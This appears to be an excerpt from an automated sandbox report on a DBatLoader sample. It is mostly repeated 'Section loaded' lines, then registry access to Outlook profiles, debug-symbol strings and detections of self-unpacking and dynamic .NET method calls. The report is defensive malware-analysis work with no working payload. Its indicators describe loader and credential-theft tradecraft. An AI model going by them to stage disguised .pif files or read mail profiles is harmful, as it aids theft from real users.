                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: z1Transaction_ID_REF2418_cmd.batStatic file information: File size 1139107 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
                  Source: Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 3.2.x.exe.31c0000.0.unpack, type: UNPACKEDPE
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
